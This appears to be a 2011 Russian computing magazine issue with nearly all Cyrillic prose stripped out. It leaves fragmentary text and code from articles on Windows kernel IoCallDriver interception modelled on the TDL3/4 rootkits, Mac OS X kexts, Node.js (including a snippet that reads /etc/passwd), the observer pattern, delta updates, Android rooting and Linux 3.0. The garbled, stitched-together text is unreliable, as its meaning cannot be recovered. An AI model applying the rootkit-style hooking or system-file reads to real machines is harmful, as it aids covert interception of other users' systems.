NT.
- Zynamics BinDiff.
,

.
,
.


-

.
?

10 /153/ 2011

Eset/Russia

,
,
. Wiki,

,
,

. ,
Malware Analysts Cookbook
,


,
?

,
, .
,

, - .

,
,

.

.
,

, , 27%
73% . ,
, ,
. ,

.

,
?
,

.


, ,
,
,
- ,
,
.
,
.
,
.
,
reddit Reverse
Engineering (www.reddit.com/r/
ReverseEngineering).

.
,
.

10 /153/ 2011

-
?


.
, ,

.

,
.
:
,
, ,

. ,


wasm.ru. , ,
, , .


?

, ,
?

?

?
, , ,
,

. , ,
, ,


,
.
,

, . ,
, -
.

, , ,
.
,

. z

,
,
.

, ,


.
,
(www.joineset.com).
,

.


, ?

,

Stuxnet Under the Microscope.


.

.

TDL3/3+/4,
,

.


?
,

097

(stannic.man@gmail.com)


IRP-
, ,
,
,
.

.

DVD

,
IoCallDriver, ,
!

INFO
, ,

/

TDL3 (4), ,
IoCallDriver,


.

: ,
, , ,
.
. , , .
, Microsoft
- (
MSDN: http://goo.gl/kPt8b, http://goo.gl/igD0b). ,
, TDI-,
.
NDIS-IM-,
. , ,
- .

, RKU, IoCallDriver

,
- ,
. . , Microsft WDM
: IoCreateDevice IoAttachDevice
, .
IRP-,
-, ,
, IRP-.
, , -
IRP-,
, .
, . ,
-, IoCallDriver.
, . , ,
major- ,
- IRP-.
NTSTATUS
FASTCALL
IopfCallDriver(

098

10 /153/ 2011

IN PDEVICE_OBJECT DeviceObject,
IN OUT PIRP Irp
)
{
Irp->CurrentLocation--;
irpSp = IoGetNextIrpStackLocation( Irp );
Irp->Tail.Overlay.CurrentStackLocation = irpSp;
irpSp->DeviceObject = DeviceObject;
driverObject = DeviceObject->DriverObject;
status = driverObject->MajorFunction[irpSp->MajorFunction](
DeviceObject, Irp );
return status;
}
, IoCallDriver
IofCallDriver, , ,
IopfCallDriver. ,
,
, ,
IoCallDriver. ! - , , major . , , IoCallDriver, ,

( , , ,
?), .

,
. IRP-,
IoCallDriver,
, . , MJ- IRP_MJ_CREATE

. - ,
IRP- , , ,
IRP-, ,
. , IoCallDriver
DeviceObject, ,
, IRP.
. IRP- IRP_MJ_
READ. IoCallDriver, IRP-,
MajorFunction IRP_MJ_READ. ,
? , , DeviceObject.
.
, ( ) ,
:
BOOLEAN IsKeybordDevice( DEVICE_OBJECT * topDevice )
{
UNICODE_STRING driverName = {0};
DEVICE_OBJECT * device = 0;
RtlInitUnicodeString( & driverName, L"\\Driver\\Kbdclass");
for (device = TopDevice;
device;
device = device->DeviceObjectExtension->AttachedTo)
{
if ( !RtlCompareUnicodeString(
&device->DriverObject->DriverName, &driverName, TRUE))
return TRUE;
}
return FALSE;
}

10 /153/ 2011

DeviceObject. ,
DRIVER_OBJECT. , IRP, , , IO_STACK_
LOCATION *stack = IoGetCurrentIrpStackLocation(pIrp).

- stack->FileObject.
,
IRP-, . , ,
- c .
!
IoCallDriver,
IRP- IRP_MJ_CREATE, stack->FileObject
:
OBJECT_NAME_INFORMATION *fileNameInformation = 0;
status = ObQueryNameString( stack->FileObject,
fileNameInformation, 1024, &retSize);
wcscat(fileNameInformation->Name.Buffer,
stack->FileObject->FileName.Buffer);
DbgPrint("file name now is: %ws \n", fileNameInformation->Name.Buffer);
... IRP-, , , , .
ULONG CreateDisposition =
(stack->Parameters.Create.Options>> 24)& 0x000000ff;
if((CreateDisposition==FILE_CREATE)||
(CreateDisposition==FILE_OPEN_IF )||
(CreateDisposition==FILE_OVERWRITE_IF))
{
Irp->IoStatus.Status = STATUS_ACCESS_DENIED;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
ExFreePool(fileNameInformation);
return STATUS_ACCESS_DENIED;
}

IRP-,
IoCallDriver, . , IoCallDriver
Windows.
, IRP- -, IRP-. ,

FastIO, . ,
IRP- ,
, IoCallDriver
. / IoCallDriver
BSODa DRIVER_UNLOADED_WITHOUT_CANCELLING_
PENDING_OPERATIONS. ,
,
IRP-. :
, IoCallDriver, IRP-.

,
. , . ,

. ,
! z

099

(seva@vingrad.ru)

KERNEL- MAC OS X
Mac OS X
iOS .
,
? . .

BSD

Mach
XNU

100

NKE

I/O Kit

MAC OS X
, . Mac OS X XNU (XNU is not UNIX). XNU
, : Mach, BSD -
IO Kit.
Mach ,
80- . , , , , ,
.
, GNU/HURD, GNU
Linux, , . -, , Mac OS X ,
, :). ,
Mac OS X Mach :
, ,
. ,
, ,
.
Mach- XNU :
;
;
;

10 /153/ 2011

kext

;
-.
BSD Mac OS X FreeBSD :
;
POSIX API, BSD;
TCP/IP BSD-;
;
;
.
Mac OS X
- IO Kit. C++ . ,
, , , , RTTI.
IO Kit C++,
. ,
IO Kit , ,
.

, : , . GDB.
kext , .
kext-manager.
kext' /System/Library/Extensions.
kext' ( ) Mac OS X
XCode. IDE.
:
1. XCode :).
2. Generic Kernel
Extension, C,
IO Kit- C++.
3. SampleKext (, :)).

,
SampleKext.c. :
SampleKext_start SampleKext_stop. , / .
, kext'


Mac OS X
, kext' (
kernel extension). XNU,

. , IOKit
kext. Kext , Mac OS X, :
plist-, , ;
Mach-O-,
, ;
, ..
kext ,
kextload . . kext' .
, . ,

10 /153/ 2011

101

kext

callback'
/ . , SampleKext_start ,
kext'.
, / .
SampleKext.c
#include <sys/systm.h>
#include <mach/mach_types.h>
kern_return_t MyKext_start (kmod_info_t * ki, void * d)
{
printf("Kext loaded.\n");
return KERN_SUCCESS;
}
kern_return_t MyKext_stop (kmod_info_t * ki, void * d)
{
printf("Kext unloaded.\n");
return KERN_SUCCESS;
}
, SampleKext.kext, ,
plist-.
kext Info.plist XML-.
:
CFBundleIdentifier kext'. , com.apple.
driver.AppleUSBMergeNub.
CFBundleExecutable kext'.
IO Kit-.

CFBundleVersion .
OSBundleLibraries , kext.
IOKitPersonalities IO Kit,
kext. , .

,
, kext'
OSBundleLibraries. , ,
kextlibs. -xml, XML-,
plist-:
kextlibs -xml MyKext.kext
<key>OSBundleLibraries</key>
<dict>
<key>com.apple.kpi.libkern</key>
<string>9.2.2</string>
</dict>
kext .
Info.plist. kext , :
kext' .
/tmp :
sudo cp -R SampleKext.kext /tmp
:
sudo kextload /tmp/SampleKext.kext
/var/log/system.log
kext'a. kext, kextunload: sudo kextunload /
tmp/SampleKext.kext.


KEXT'

OSBUNDLELIBRARIES
102

OUTRO
Mac OS X. ,
, .

, , , .
kernel-! z

10 /153/ 2011

(kononencheg@gmail.com)

JavaScript

NODE.JS
,
JavaScript.


,
.
, JS !

104

LINKS

INFO

nodejs.org
,

.



Node.js.

.


publish/subscribe,

Redis. ,
.

10 /153/ 2011

JavaScript

NODE.JS

,
. Python Twisted
. Node.js .
, Node.js I/O JavaScript. ,
JavaScript-, ,
, ,
, HTTP- .
, c , web, :
var http = require('http');
http.createServer(function(request, response) {
response.writeHead(200, {'Content-Type': 'text/plain'});
response.end(', !');
}).listen(8080, '127.0.0.1');
console.log(' http://127.0.0.1:8080/');
:
% node __.js
http://127.0.0.1:8080/
, <html>
<head><title>... . ;) !
? !
. !
JavaScript- Node V8,
/ .
,
. , Node

, -, -. , , .

NODE
, ,
require. ( )
.
. ++ V8, JavaScript. JS- :
circle.js
exports.area = function (r) {

return Math.PI r r;
};
exports.circumference = function (r) {
return 2 Math.PI r;
};
exports.
,
(area circumference ). :
var circle = require('./circle.js');
console.log( ' 4 %d',
circle.area(4));
,
console,
stdout stderr. log() printf- (
JavaScript . . .)
stdout, error() stderr.
process,
.
,
:
process.stdout, process.stderr process.stdin /. write ,
concole.log console.error, stdin
. Node -,
. :
process.stdin.on('data', function (chunk) {
//
process.stdout.write('data: ' + chunk);
});

10 /153/ 2011

, ,
callback-. .
, , ,
.
process.argv , .
//
process.argv.forEach(function (val, index, array) {
console.log(index + ': ' + val);
});

105

process.cwd() .
process.pid, process.getgid() process.getuid() id , gid uid.
process.kill(pid, signal='SIGTERM') .
process.exit(num) . ,
,
:
process.on('exit', function () {
console.log(' ... ...');
});

,
, , Node.
, Node.js
. , , ,
, -! -
CGI-, , !
.



,

real-time web.
. ,
, ,
.
- !
--
, :
Soket.IO http://socket.io/
. . , , .
: - .
, . ,
, .
( !) Beseda,
,
(goo.gl/9SoJR). Bayeux
.
,
. , Soket.IO , -.

( 5000). Beseda 20 000 . -
.

!
,
. , .
Node.js JavaScript,
. .
io.js.
server.js index.html.
long-polling-, . ,
, .
,
Soket.IO ,
, ! -,

106

NODE
Node.js .
:
fs .
, .

fs.readFile('/etc/passwd', function (err, data) {


if (err) throw err;
console.log(data);
});
crypto : (sha1, md5, sha256, sha512 . .),
, , .
net TCP.
var net = require('net');
var server = net.createServer(function (c) {
c.write('hello\r\n');
c.pipe(c);
});
server.listen(8124, 'localhost');
dgram UDP- .
events .
util : , .
tls OpenSSL, SSL-
.
vm JavaScript-, . .
(eval ) js- .
var localVar = 123,
usingscript, evaled,
vm = require('vm');
usingscript = vm.runInThisContext('localVar = 1;',
'myfile.vm');
console.log('localVar: ' + localVar +
', usingscript: ' + usingscript);
// localVar: 123, usingscript: 1
dns (MX . .).
http, https web-.
child_process , , exec,
spawn . .
os , .
, , : MySQL
-.

JS-
NODE

V8
10 /153/ 2011

JavaScript

. , long-polling-, . .
,
,
, .
io.js :
//
var CHECK_INTERVAL = 1000;
//
//
var MAX_LOOP_COUNT = 10;
//
var connections = {};
//
var LongPollingData = function() {
this.loopCount = MAX_LOOP_COUNT;
this.dataQueue = [];
this.response = null;
};
//
function mainLoopIteration() {
var pollingData;
for (var id in connections) {
pollingData = connections[id];
if (pollingData.response) { //
pollingData.loopCount--;

10 /153/ 2011

// ...
if (pollingData.dataQueue.length
|| pollingData.loopCount === 0)
flush(pollingData); // ...
}
}
}
function flush(pollingData) {
pollingData.response.end(pollingData.dataQueue.join('|'));
pollingData.dataQueue = [];
pollingData.response = null;
}
setInterval(mainLoopIteration, CHECK_INTERVAL);
. , ,
, ,
. .
!
, .
var lastID = 0; //
//
var init = exports.init = function(request, response) {
var id = 'connection_' + ++lastID;
connections[id] = new LongPollingData();
response.end(id);
};

107


//
var hold = exports.hold = function(id, request, response) {
var pollingData = connections[id];
if (pollingData.response !== null)
flush(pollingData);
pollingData.response = response;
pollingData.loopCount = MAX_LOOP_COUNT;
};
//
var write = exports.write = function(id, data) {
var pollingData = connections[id];
pollingData.dataQueue.push(new Buffer(data.toString()));
}
//
var broadcast = exports.broadcast = function(data) {
for (var id in connections) write(id, data);
}
,
require:
var io = require('./mycoollibrary/io.js');
io.broadcast(' ');

WebSocket HTTP.
Flash Socket WebSoket
. -.
Long polling . ,
HTTP- ,
- ,
. jsonp-
. .
Multipart streaming . HTTP, .
Firefox.
Forever Iframe ,
. .


,
. server.js :
var http = require('http'),
fs = require('fs'),
io = require('./io.js'); // !
var server = http.createServer();
server.addListener('request', handleRequest);
server.listen(80, 'localhost');
function handleRequest(request, response) {
if (request.method === 'POST') {
io.init(request, response);
} else {
if (request.url === '/' || request.url === '/index.html') {
fs.readFile('./index.html', function (err, content) {
response.end(content);
});
} else {
io.hold(request.url.split('/').pop(), request, response);
}
}
}
// - !
setInterval(function() {
console.log(" !");
io.broadcast(" !");
}, 500);
POST- , GET- /_
.
500 .
, ,
.
. , , .
index.html (
jQuery):

108

<script>
var conectionID;
function connect() {
$.post("http://localhost/", function(data) {
conectionID = data;
poll();
});
}
function handleData(data) {
data = data.split('|');
while(data.length > 0)
$('body').append(data.shift() + '\n');
poll();
}
function poll() {
$.get("http://localhost/" + conectionID, handleData);
}
connect();
</script>

. , .
, ,
, .

, Node.js , , .
, ,
JavaScript, ! ,
... . z

10 /153/ 2011

/ TIPS&TRICKS

deeonis (deeonis@gmail.com)

.
,
-.
,
, ,
.

<<interface>>
Observable
+AddObserver(o: Observer)
+RemoveObserver(o: Observer)
+NotifyObserver()

ConcreteObservable
-observers: Observer[]

o..*

<<interface>>
Observer

+AddObserver(o: Observer)
+RemoveObserver(o: Observer)
+NotifyObserver()

HadleEvent()

10 /153/ 2011

, ,
. , , HDD,
. ,
, ring-3
.
, .

,
. . ,
, ,
.

SystemInfo,
.
, ,
SystemInfo . , .

SystemInfo
class SystemInfo()
{
...
float getCPUTemp();
float getGPUTemp();
int getHDDSpeed();

ConcreteObserer
+HadleEvent()

void notifyClients();
}

109

/ TIPS&TRICKS
getCPUTemp, getGPUTemp getHDDSpeed
. ,
. notifyClients, ,
,
.
- SystemInfo. ,
, , notifyClients
.


,
,
HDD. , notifyClients, ,
- . ,
, : cpuTemp, gpuTemp hddSpeed.
SystemInfo,
notifyClients, ,
:
notifyClients()
void SystemInfo()
{
float t_cpu = getCPUTemp();
float t_gpu = getGPUTemp();
int s_hdd = getHDDSpeed();
cpuTemp.update(t_cpu, t_gpu, s_hdd);
gpuTemp.update(t_cpu, t_gpu, s_hdd);
hddSpeed.update(t_cpu, t_gpu, s_hdd);
}
, , ? -,
. SystemInfo

. , , ,
,
, , ,
. -, ,
update(),
SystemInfo , . -, update() , .
.


,
.
,
, , ,
.
, .
.
, : , , . . Subject,
, , . . Observer. Subject
, , . Observer
.


, ,
.
Subject Observer.

110

Subject Observer
class Subject()
{
public:
void registerObserver(Observer &obs) = 0;
void removeObserver(Observer &obs) = 0;
protected:
void notifyObservers() = 0;
}
class Observer()
{
public:
void update(float t_cpu, float t_gpu, int s_hdd) = 0;
}
registerObserver() removeObserver() / .
notifyObservers() , update()
Observer .
: SystemInfo, CpuTemp, GpuTemp HddSpeed.

class SystemInfo() :
public Subject
{
public:
void registerObserver(Observer &obs)
{
// ,
//
}
void removeObserver(Observer &obs)
{
// ,
//
}
//...
protected:
void notifyObservers()
{
// , update()
// Observer
}
}
class CpuTemp() : public Observer
{
public:
// ...
void update(float t_cpu, float t_gpu, int s_hdd)
{
// , SystemInfo
}
}
// GpuTemp HddSpeed
// CpuTemp
registerObserver() removeObserver() , , ,
. , ,
-

10 /153/ 2011


struct SIData
{
float t_cpu;
float t_gpu;
int s_hdd;
}
class SystemInfo() : public Subject
{
public:
...
//
float getCpuTemp();
float getGpuTemp();
int getHddSpeed();
...
}
class Observer()
{
public:
void update(SIData *data = NULL) = 0;
}
PHP-

STL-. notifyObservers() ,
update().
, Observer,
SystemInfo, .
. , SystemInfo
, , Observer.
,
SystemInfo. ,
, . .


,
SystemInfo.
, GpuTemp
, HDD .

, update(),
. . . SystemInfo
, / SSD-,
Observer, ,
update() ,
. notifyObservers().
, , .

( ) . update() .

. ,
, ,
, . .
SystemInfo.

10 /153/ 2011

class CpuTemp() : public Observer


{
public:
// ...
void update(SIData *data)
{
if (data == NULL)
{
float t_cpu = sysInfo.getCpuTemp();
}
// , SystemInfo
}
}
// GpuTemp HddSpeed
// CpuTemp
, Observer,
, Subject.
, ,
- , . C++
,
. Observer,
Subject.
-
Subject.
,
, Observer
, Subject,
.

-, ,
, . , - . z

111

UNIXOID

(execbit.ru)

,

.

, ,
diff.
,

,

.

112

LINKS
goo.gl/MaO8l

Ksplice.

INFO
Debdelta
'--delta-algo',


.
: xdelta,
xdelta-bzip, xdelta3
bsdiff.
Makefile
binpatchng

,
,


OpenBSD (goo.
gl/FY7PX).


.
Ksplice ,
uptime 100 %,
xdelta bsdiff,
,
deltup, 95 %.
binpatchng,
OpenBSD .

KSPLICE
, Ksplice Oracle . ( , , ),
Linux ,
-
.
Ksplice ,
. .
,
Linux-
, diff-.
, ,

10 /153/ 2011

, ,
. - ,
.
ksplice.ko, -
. ksplice.ko
, , -.
, .
,
,
, ,
,
. Ksplice , 84 % bugfix-
, .
.
, 2009 ., Ksplice Inc.,
, Ksplice-.

. : Ksplice
Oracle,
-
Ubuntu Fedora, RHEL Unbreakable Linux. .
, . Ubuntu Fedora
ksplice.com , :
$ sudo apt-get install curl
$ sudo dpkg -i ksplice-uptrack.deb
.
. Install,
.
- ,
. .

XDELTA, BSDIFF
, Ksplice
, ,
. UNIX :
xdelta, rsync,
,
xdelta3 bsdiff,
BSD-.

diff, ,
.

, ,
, tar.gz- . ,
, , Wikipedia (ru.wikipedia.org/wiki/
-), ,
.
diff? :
,
.
,
, . -

10 /153/ 2011

OpenBSD 4.8

, ,
- ,
.
,
. -, . pacman ArchLinux
debdelta, Debian.
-, delta-,
.
, ,
, , (
). -, ,
. , ( )
( debdelta,
, ).
, :
ArchLinux .
xdelta:
$ sudo pacman -S xdelta3
/etc/pacman.conf,
UseDelta. /etc/pacman.d/
mirrorlist :
Server = http://delta.archlinux.fr/$repo/os/$arch
:
$ sudo pacman -Syu
, , .
, archlinux.fr , ,
, .
Debian .
( , ) debdelta,
deb- ,
xdelta
.
,

113

UNIXOID
deltup Gentoo , FreeBSD.
, deltup-. , ,
:
Gentoo . deltup getdelta:
$ sudo emerge deltup getdelta
/etc/make.conf :
$ sudo vi /etc/make.conf
FETCHCOMMAND="/usr/bin/getdelta.sh \"\${URI}\" -O
\"\${DISTDIR}/\${FILE}\""
emerge ,
getdelta .
/etc/deltup/getdelta.rc :

binpatch Makefile

apt-get.
, debdelta apt-get,
:
$ sudo apt-get update
$ sudo debdelta-upgrade
$ sudo apt-get upgrade

$ sudo vi /etc/deltup/getdelta.rc
# ( )
LOCAL_MIRROR=1.2.3.4
#
MAXIMUM_ACCEPTABLE_QUEUEPOS=10
#
REMOVE_OLD=yes
LOCAL_MIRROR ,
, Gentoo-, deltup-. MAXIMUM_
ACCEPTABLE_QUEUEPOS
. deltup-
,


( ).
debdelta :
$ sudo apt-get install debdelta
, BSD- xdelta bsdiff
(www.daemonology.net/bsdiff) .
freebsd-update
FreeBSD 2005 . ,
freebsd-update install, bsdiff ( ,
bspatch), . BSD-,
, bsdiff BSD.

DELTUP

, Gentoo. deltup
(deltup.sourceforge.net),
, ,
diff, ,

. , deltup-
,
,
. : deltup- 15 %
, 5 % ( deltup-: goo.gl/IetJU).

114

Ksplice

10 /153/ 2011

, inux01.gwdg.de

. - ,
, , . - deltup- ,
linux01.gwdg.de, getdelta
.
,
.
deltup FreeBSD.
deltup- Gentoo (-
).
FreeBSD deltup , :
1. deltup wget :

$
$
$
$

cd /usr/ports/sysutils/deltup
sudo make install clean
cd /usr/ports/ftp/wget
sudo make install clean


$ bsdiff _ _ _
$ bspatch _ _ _
$ xdelta3 -e -s _ _ _
$ xdelta3 -d -s _ _ _
$ deltup -mjb 9 _ _ _
$ deltup -p _
$ debdelta _ _ _
$ debpatch -A _ / _

10 /153/ 2011

2. /etc/make.conf :

$ sudo vi /etc/make.conf
FETCH_CMD=/usr/local/bin/getdelta.sh
, - portupgrade, deltup-.
, deltup
, ,
( gzip bzip2).
, NO_CHECKSUM:
$ cd /usr/ports/games/cowsay
$ make NO_CHECKSUM install clean

OPENBSD BINPATCH
, ,
, ,
OpenBSD.
,
OpenBSD, ,
.
, .
, , ,
, /
, .
, . OpenBSD
,
OpenBSD, ,
.
,
,

115

UNIXOID

Ksplice

, . ,
binpatch (openbsdbinpatch.sf.net), , ,
. binpatchng (binpatchng.puffy-at-work.org),

, OpenBSD-, ,
.
Binpatchng Makefile
. , Makefile , , make.

,
.
:

3.
( ftp://ftp.openbsd.org/pub/OpenBSD/4.9/i386/)
distfiles/_.
4. Makefile. www.openbsd.org/
errata.html, ( 4.9 ,
4.8), ( 001_
bgpd.patch), .
. Makefile. :
/usr/binpatchng-1.1/Makefile :

# vi /usr/binpatchng-1.1/Makefile
# ? ( ,
# .)
ARCH=i386
# ( patch)
PATCH_COMMON=001_bgpd
# 001_bgpd.patch
001_bgpd:
cd ${WRKSRC}/usr.sbin/bgpd
(${_obj}; ${_depend}; ${_build})
#
,
, .

. , :
cd usr.sbin/bgpd
make obj
make depend
make
make install
Makefile, . ,
Makefile.sample. :
#
#
#
#

cd /usr/binpatchng-1.1/
make PATCH="001" build
make PATCH="001" plist
make PATCH="001" package

patches,
:
# pkg_add binpatch-4.9-i386-001.tgz z

1. /usr
( ):
$ cd /tmp; wget http://goo.gl/hvF7O
$ su
# tar -xzf /tmp/binpatchng-1.1.tar.gz -C /usr
2. sys.tar.gz src.tar.gz FTP
distfiles, binpatchng:
#
#
#
#
#

cd /usr/binpatchng-1.1/
mkdir distfiles
cd distfiles
wget ftp://ftp.openbsd.org/pub/OpenBSD/4.9/sys.tar.gz
wget ftp://ftp.openbsd.org/pub/OpenBSD/4.9/src.tar.gz

116

Ksplice

10 /153/ 2011

UNIXOID

(execbit.ru)

MEGAFAQ
ANDROID OS
, , ,
- Android
,
,
,
,
.
.
FAQ
,
,
Android.
, , root
Android, ,
,
Android , , .

ANDROID
?

Android
.
,
Android :
1. . Android-
, . ,

,
. , ,
Java, .
2. . Android
Linux-

.

118

Android ( 5 )

(app_1, app_2, app_3 . .)


umask 0026
(u=rwx,g=rx,o=x).
, .
3. . Android-
, ,
,
.
-
.
, Android , ,
. Android
, ,
,

( Android ,
).

,

root,
, Linux,
, ,

, su

( , root-
T-Mobile G1,
telnet).
root (
su) ,
.
(Motorola, !)
NAND-,
,

root ( ,
).

.
,
, busybox,
, ,
root (,
), .
root ,

.
Rooting root

.

Android

10 /153/ 2011


,
Linux- root
.
SuperOneClick (goo.gl/HIbN),
, z4root (goo.gl/Bv7tx),
Android.


, 95 %
,
:
, , - ,

-- .
.
,
Android Google
.

, . ,
Android
CyanogenMod (www.cyanogenmod.com).
.

CYANOGENMOD
ANDROID?

CyangenMod , ,
,
Google, ,
, .

,
Google.
,


( / JIT,
, , ,
,

).
(,
),

SD-,
, T-Mobile,
,
, ,
FM- ( FM-),


(/ Wi-Fi,
Bluetooth, 3G . .).
busybox SSH-, . CyanogenMod
,

(www.cyanogenmod.com/devices).
,
CyanogenMod. xda-developers.com.

,

.
,
Windows.

,
,

(
).

, ,

( CyanogenMod),
. , (, ROM
Manager
SuperOneClick), SD-
zip- ,
,
Flash zip from sdcard, zip- .

Android ( )

NAND-,
Recovery ,
/

/,
,
(). Recovery
, ,


(

). ,

(, ) (Enter).

Recovery
.
, ( ),
(nandroid
backup) , Android,
swap,
/ .


, Android Market,
. Launcher,
Google, ,
, .
LauncherPro Zeam.
, Android Market ,
. -, Launcher7,
Windows Phone 7, , ,
. -, SlideScreen (
beta- : getsatisfaction.com/larvalabs),
(, SMS-, , , RSS-,
, Facebook . .) .
, - .
Simple Home, Windows Phone 7,
Spark, Android SlideScreen.

10 /153/ 2011

119

UNIXOID

CyanogenMod

CyanogenMod

CyanogenMod

ClockworkMod recovery,
Koushik Dutta (Koush).

lib Linux- (
), media
, bootanomation.zip ,
,
, audio
, . . (
Ogg Vorbis, ).
usr ,
Linux-
. build.prop .

,
:

.
:
Android ,
Linux-,
( ,
,

).
Android,
.
:
.
,
Android , ,
,
Android . ,
, ,
. , ,
,
,
(/ ,
), . :
:
$ wget http://a.b.c/update.zip

120

$ mkdir myrom
$ cd myrom
$ unzip ../update.zip

boot.img. META-INF
- ,
,
META-INF/com/google/android/
updater-script, , ,
Recovery .
boot.img Linux
ram-,
split_bootimg.pl (goo.gl/QejM9). ,
system
. ,
Android, . app,
( , , ), bin xbin Linux- ( xbin
busybox), etc
, fonts , framework Java-,
framework-res.apk
, ,
( xda-developers.com ),

$ zip -r myupdate.zip *
, Recovery
.
testsign.jar:
$ wget http://goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
myupdate.zip myupdate-sign.zip
SD-
Recovery.


SetCPU,

10 /153/ 2011

Android ( ): ADW.Launcher, Launcher7, Simple Home, SlideScreen

.

,
:
,
, . .
CyanogenMod:
CyanogenMod .
, SetCPU.
/
JIT-,
(
RAM)
VM heap,
(
)
( ).
root, Jitter VM Heap Tool.

TASK KILLER ?

Task Killer , .

,

. , Android,

10 /153/ 2011

, ,



.
,

, .
,
.

:

.
,

.
, ,

, . ,
,

. /sys/
module/lowmemorykiller/parameters,
,
lowmemorykiller:
echo "2560,4096,6144,12288,14336,18432" > /sys/
module/lowmemorykiller/parameters/minfree


/system/etc/init.d, ,
/system/etc/init.d ,
. ,
.


. Android
,
,
. , , , , Bluetooth, , ( Gmail,
), (,
).
, Startup Cleaner
( ).


ADB?

ADB Android Debug Bridge, Android-,


, , ,
,

.

(][_09_2011), . z

121

UNIXOID

Adept (adeptg@gmail.com)

3.0
?

Tux
Linux

LINUX KERNEL 3.0:


Linux 20-.
2.6.40 3.0. ,
, ,
2.6.
122

Linux
. - ( 2011.4.0),
. 2.6.40 3.0, (. .
3.0.1).
- , 40
. 40 ,
.
3.0
2.6.
:
Xen
.
Btrfs,
. : ext4
, OCFS2
TRIM (
SSD). CIFS Windows 2008 DFS ( ).

tcpdump.
64- .
Wake on WLAN. Wake on
LAN, .
/ ICMP-
root. SUID /bin/ping.
Cleancache, , ( ).

10 /153/ 2011

3.0

Intel

: Microsoft
Kinect, Intel (Ivy Bridge)
AMD Fusion.

rt- (Realtime) , Linux
. 2.6.33.

(374 690),
.
, , 3.0, 361
Microsoft.
Hyper-V. ,
Microsoft Linux.
Linux, Microsoft,
Microsoft Linux.

, IT-
. , , KVM (Kernel-based
Virtual Machine, Linux 2.6.20). ( )
Xen 3.0. ( ), KVM
CPU .
Linux ( )
, .
, KVM Xen, VMWare MS Hyper-V.
lguest. KVM
. Xen .
5000 . -
: .

, .
KSM (Kernel Samepage Merging),

10 /153/ 2011

. , .
, ,
.
Linux OpenVZ,
. LXC, : namespaces (
,
, .) Control Group
( ).


.
- (). 2.6
, :
SMP- 4096.
,
, 32 65 536.
.
, , mission critical,
, . , , CPU hotplug,
Linux 2.6.
, , -
(), , .
2.6 Big
Kernel Lock , Linux 2.0 SMP-,
. Receive Packet Steering
(RPS) Receive Flow Steering (RFS),
CPU.
, : Tile, 32- .
RAID. 2.6 :

123

UNIXOID
16 000 000

14 000 000

12 000 000

10 000 000

8 000 000

6 000 000

4 000 000

2 000 000

0
0.1

1.0

1.2

2.0

2.2

2.4

2.6

3.0

RAID6 (
).
RAID5 reshaping
.
RAID1 RAID5, RAID4 RAID5,
RAID5 RAID6 ( ).

. ,
- (,
, iSCSI AoE).
Oracle Cluster Filesystem (OCFS2)
Oracle.
Global File System (GFS2) , RedHat.
, , -.
( ), :
POHMELFS (Parallel Optimized Host Message Exchange Layered File
System) ( ,
, , ) NFS.
Ceph , (
) (
,
).
, 2.6 , DRBD,
( , RAID1).
:
exofs, OSD- (Object Storage Devices).
, ,
.
, , , .
libata NCQ hotplug.

124

InfiniBand,
RDS (Reliable Datagram Sockets),

. -500
90 % Linux.

desktop-
x86/amd64, .
, embedded-CPU-. 2.6
: UniCore, m68knommu, m32r, Fujitsu FR-V, Atmel AVR32,
MicroBlaze, S-core. 2.6 embedded linux:
,
Linux .
Execute-in-place .
ASoC (ALSA System on Chip)
ALSA SoC ( ).
UBI - LVM raw-flash- (
). LVM . Nokia
UBIFS, UBI-.
, Flash-, LogFS.
.
SPI SDIO (Secure Digital I/O)
MMC/SD- (GPS-,
Wi-Fi-, Bluetooth- Ethernet- ).
CAN (Controller Area Network). , ,
.
Linux Sony
PS3 (, ), Nintendo Wii Gamecube.
embedded-,
. Google Android Linux . Google, Android,
, ,
.


Linux PC , 2.6.0 12 %.
, Linux user.
, desktop-,
. 2.6
(, Linux ). :

3.0
3.0 ,
,
(, #ifdef LINUX2
).
,
Fedora 15 Linux 3.0 2.6.40,
.

10 /153/ 2011

3.0

GPU switching . , X Server


.
HDD 512 (
4 ).
PPTP L2TP. .
HDD . .
CFS (Completely Fair
Scheduler)
.
,
,
(tickless),
.

, Microsoft 20 Linux

, , Linux
. -
, - . 2.6
FUSE (Filesystem in Userspace). ,

( ), .
,
,
. :
SSHFS SFTP.
GmailFS Gmail.
WikipediaFS Wikipedia
( ).
, FUSE:
NTFS-3G NTFS Linux.
ZFS-Fuse ZFS (
- ).

menuconfig

USB
UVC (Universal Video Class)
gspca - (
230 -UVC-).
USB3.0 ACPI4.0 Linux ,
.
: Wireless USB, WiMAX (IEEE 802.16).
Nvidia Nouveau 3D-.
Kernel mode-setting (

, X Server)
. .
USB , VGA- USB-.
hibernation
/ .

10 /153/ 2011

FUSE CUSE,
( )
. ,
, , OSS Proxy,
OSS /dev/dsp, /dev/adsp /dev/mixer.


3.1 ,
, . :
Open-Source-CPU- OpenRISC.
Nintendo Wii
Wii Remote.
Intel (Sandy Bridge).
Nouveau
GeForce 400/500.
Intel GMA500.

Intel ,
-
, , , Intel GMA500 PowerVR SGX 535
Imagination Technologies.

125

UNIXOID
13,9%

24,7%

12,9%

0,9%
0,9%
0,9%
1,0%
1,1%
1,2%
1,3%

11,2%

1,6%

DCCP (Datagram Congestion Control Protocol, RFC 4340) .


, , ,
(VoIP, /, ).
IEEE 802.11s mesh-.
peer-to-peer- ,
. B.A.T.M.A.N. (Better Approach To
Mobile Adhoc Networking), mesh-.
,
. www.open-mesh.com.

2,0%

accel-pptp, PPTP/PPPoE/L2TP- PPTP-


.
CPU.

2,5%
2,6%

8,9%

4,1%

8,3%


RedHat
Novell
IBM
Intel

Linux Foundation
Consultant
SGI
MIPS Technologies
Oracle
MontaVista

Google
Linutronix
HP
NetApp
SWsoft

, :
Linux

:
ext4 ext3. , , 1 (260 ).
NILFS2 - ,

, .

.
Btrfs ZFS Sun ( Oracle)
(, ,
SSD ).
, . ( Fedora 17).
Squashfs read-only-
. , , LiveCD/USB.
Ecryptfs , .
, . . /,
.

: NTFS,
/ HFS+ HFSX ( Mac OS X), / UFS2
( BSD-).
FS-Cache, ,
, NFS, AFS CIFS.
.

2.6 IPv6 (netfilter, SELinux, ),


:
UDP-lite (RFC 3828) UDP-,

.
(VoIP, ) , .

126

(Mandatory Access
Control), , SELinux, :
AppArmor SELinux,
( 2.6.36). .
TOMOYO AppArmor, . AppArmor
,
. , /bin/bash,
sshd, , .
SMACK (Simplified Mandatory Access Control Kernel) SELinux (
), .
, , :
, USB-.
IMA (Integrity Management Architecture) , ,
.
